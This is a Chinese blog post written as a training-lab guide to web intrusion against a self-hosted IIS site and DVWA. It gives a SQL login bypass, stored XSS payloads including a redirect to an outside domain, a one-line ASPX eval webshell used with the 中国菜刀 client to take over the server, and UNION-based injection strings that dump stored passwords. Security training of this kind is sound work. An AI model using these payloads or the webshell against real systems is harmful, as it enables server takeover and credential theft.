利用Web漏洞入侵网站并控制服务器&&Web漏洞原理与利用

于 2024-04-15 22:01:17 发布
阅读量856 收藏 17
点赞数 19
文章标签: 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_72661106/article/details/137797088
版权

实训目的

深入理解网络无安全的思想。

了解局域网查看软件Lansee的使用方法。

了解端口扫描软件AdvancedPortScanner的使用方法。

了解Web后台扫描软件御剑的使用方法。

了解网站漏洞扫描工具AWVS的使用方法。

了解Webshell连接工具中国菜刀的使用方法。

掌握端口及漏洞扫描的基本知识,能够利用工具进行扫描工作。

掌握网站入侵的一般流程。

实训准备及注意事项

1.硬件:装有Windows操作系统的计算机1台(关闭防火墙和杀毒软件),接入某局域网。

2.软件:LanSee、AdvancedPortScanner、御剑后台扫描工具、网站漏洞扫描工具AWVS、中国菜刀。

3.严格按照实验步骤进行实验,实验结果以截图的形式进行保留。

4.实验后务必将相关工具软件从机器彻底删除,避免工具被恶意利用影响网络正常使用。

实训准备 在windows上部署一个IIS web服务

安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务

注意:如果.net环境安装不全可在CMD下输入:

"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable

如使用64位的windows系统需要应用程序池设置32位应用程序为true。

漏洞利用

网站后台绕过

1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。

2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。

3、输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。

4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。

5、进入网站后台管理界面。

篡改页面内容

1、在网站前台或后台中寻找能够提交信息的合适位置。

2、提交代码<script>alert("test")</script>,使用另外的主机访问此网站,观察效果。

3、提交代码(代码中的网址可更改):

<script>window.location.href="http://d.mytanwan.com"</script>,观察效果。

上传后门程序(木马)并控制目标主机

一句话木马的使用

1、新建文本文档,将文件后缀修改为aspx,书写内容如下:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。

DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

DVWA共有十个模块,分别是:

1.Brute Force(密码破解)

2.Command Injection(命令行注入)

3.CSRF(跨站请求伪造)

4.File Inclusion(文件包含)

5.File Upload(文件上传)

6.Insecure CAPTCHA (不安全的验证码)

7.SQL Injection(SQL注入)

8.SQL Injection(Blind)(SQL盲注)

9.XSS(Reflected)(反射型跨站脚本)

10.XSS(Stored)(存储型跨站脚本)

SQL注入

1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。

2、输入1提交,将正常返回查询结果。

3、输入1’提交,将返回一个错误。

4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。

5、输入1' union select 1,database()#提交,得到数据库名称。

6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。

7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。

8、输入1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。

Diceee
关注
  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
一、文件上传漏洞原理 文件上传漏洞是由于 Web 应用程序没有正确地验证用户上传的文件类型和内容,导致攻击者可以上传恶意文件,例如木马文件、病毒文件等。这些恶意文件可以执行恶意代码,获取服务器控制权,...
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
【网络安全原理与应用:Windows命令执行漏洞演示】 在网络安全领域,Web应用安全是至关重要的一环,而Windows命令执行漏洞则是其中常见的威胁之一。本演示主要针对Windows系统中的命令执行漏洞,通过DVWA(Damn ...
是搞网站的都应该了解-浅谈网站入侵的常用方法和一般思路
DTable&DTControls爱好者
01-23 1809
 上次发现网站文件夹的好几个目录下出现了不明的asp文件,才发现中了asp木马。通过日志分析,发现黑客是通过论坛程序的漏洞上传的木马文件。后研究了很多有关的资料,通过限制文件夹的写入权限以及禁用了论坛的上传功能来暂时获得了相对的安全。希望大家引以为戒,不要在问题出现后才开始关注安全问题。其实,如果服务器上安装了一个好的防病毒软件,这样的木马程序是无法藏身的,比如使用江民的病毒防火墙,就能基
网站入侵常用方法集合
积木网络
02-09 1532
一:注入类:access数据库首先猜解管理员密码:手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。)工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。找出后台:用明小子,啊D,等工具都可以找的。但有时候会找不到。为什么呢?建议用多线程后台扫描工具。里
web攻击之八:溢出攻击(nginx服务器防sql注入/溢出攻击/spam及禁User-agents)
weixin_34288121的博客
10-28 569
一、什么是溢出攻击     首先, 溢出,通俗的讲就是意外数据的重新写入,就像装满了水的水桶,继续装水就会溢出,而溢出攻击就是,攻击者可以控制溢出的代码,如果程序的对象是内核级别的,如dll、sys文件等,就可以直接操控系统内核了     其次,分类:按对象名加以区分:IIS溢出、SQL溢出等,就是按对象名来加以区分,按特点区分:远程溢出、本地溢出     最后,溢出的基本原理:一是内存溢出...
WEB入侵的过程
06-27 620
本中文描述了如何通过WEB入侵获得freebsd 4.0的root权限。文章主要以教育为目的,希望各位观者不要使用本文中的一些方法及程序,危害网络的安全。 很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于个人爱好,所以我决定看看系统的安全性。 telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [E
web入侵讲解
weixin_46551178的博客
10-27 1218
大家好我是:Mr.唐 序言:浅谈网站入侵的常用方法和一般思路 首先介绍下什么样站点可以入侵 我认为必须是动态的网站 如ASP PHP JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的 14种可利用入侵方法 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMA...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
计算机病毒与防护:文件上传漏洞原理 文件上传漏洞是网络安全领域中的一个重要问题,尤其是在Web应用程序中,这种漏洞可能导致严重的安全威胁。许多网站提供文件上传功能,例如用户上传头像、社交网络上的照片分享...
Web应用安全Web应用服务器.pptx
06-19
为了保护Web应用服务器,需要采取多种措施,如使用最新的安全更新,实施严格的访问控制策略,使用安全编码实践,以及利用防火墙、入侵检测系统等安全工具。 总的来说,Web应用服务器Web服务的核心,它们需要处理...
IIS短文件名漏洞利用工具
11-07
IIS短文件名漏洞利用工具就是针对这一漏洞设计的,它允许攻击者通过构造特殊的URL请求来触发漏洞,进而获取服务器控制权,或者执行任意代码。工具的一键利用特性意味着用户无需深入理解漏洞的底层原理,只需简单...
web安全-网站入侵
Coisini的博客
05-27 700
WEB站点入侵常规方法
最新发布
2301_76161259的博客
03-29 151
打个形象的比喻, 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改 COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
WEB入侵的过程jsp
12-27 3117
 作者:lovehacker 本文描述了如何通过WEB入侵获得freebsd 4.0的root权限。 文章主要以教育为目的,希望各位观者不要使用本文中的一些方法及程序,危害网络的安全。 作者:lovehacker 联系方式:lovehacker@263.net 网站地址:http://www.chinansl.com 版权属安盟信息科技有限责任公司所有,允许转载,但需保持文章的完整性。
web安全系列1:入侵的途径
04-15 221
大家好,接下来的很长一段时间我都会介绍和web安全有关的知识,欢迎大家关注和转发。 话不多说,我们首先来看看今天的主题----入侵的途径。当然,今天介绍的都是针对web网站的常用手法和技巧。 不可否认当今的web已经步入了2.0的时代,它的强大功能已经不亚于一般的桌面软件了。强大和复杂是相互关联的,而复杂又和不可控、不完全掌握紧密相连,这就导致了web成为新一轮攻击热点。那么,一...
Web渗透入侵流程思路
2301_76161259的博客
03-27 686
什么是web渗透入侵呢?渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。下面就来一起学习分享一下web入侵渗透流程中的思路,首先献出一张宝贵的图,这张图上写的就是入侵流程,比较不错,所以拿出来分享一下。咱们先总览一下整个流程。大家现在看到的这图左上部分,首先第一部分就是信息收集,有了信息才能开展下一步。首先要进行的就是信息收集,第一个必须要会用的就是whois。
常见的Web攻击手段,拿捏了!
Cbuc丶的博客
08-15 1129
大家好,我是小菜。 一个希望能够成为 吹着牛X谈架构 的男人!如果你也想成为我想成为的人,不然点个关注做个伴,让小菜不再孤单! 本文主要介绍 互联网中常见的 Web 攻击手段 如有需要,可以参考 如有帮助,不忘 点赞 ❥ 微信公众号已开启,小菜良记,没关注的同学们记得关注哦! 午饭期间,读者小李与我闲聊,谈到上周去面试的过程。经典的高开低走,面试初期答的还可以,但是到后面却不尽人意。其中有个面试问题引起了我的注意,面试官当时问小李:你知道有哪几种常见的 Web 攻击手段吗? Web 攻击手段?对于开发
常见的Web攻击方式有哪些?黑客:28种总有一款适合你
weixin_48906169的博客
02-09 705
web常见28种黑客入侵方式
针对Web服务器的八种入侵攻击方式
o℃的浪漫屋
07-03 726
一、WEB服务器面临威胁 在了解WEB服务器安全状况之前,首先要让大家了解网站安全的另一面——黑客攻击。97至98年互联网开始在中国兴起之时,黑客就已经诞生了,在98年印尼排华事件中,中国黑客对印尼ZF网站的打击行动通过媒体的渲染,让黑客一词进入了广大中国网民的眼帘。随着几次黑客大战的爆发以及媒体对黑客的渲染,让更多人加入了黑客这个队伍。那么黑客都是通过怎样的技术手段实施攻击的呢?97年到200

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值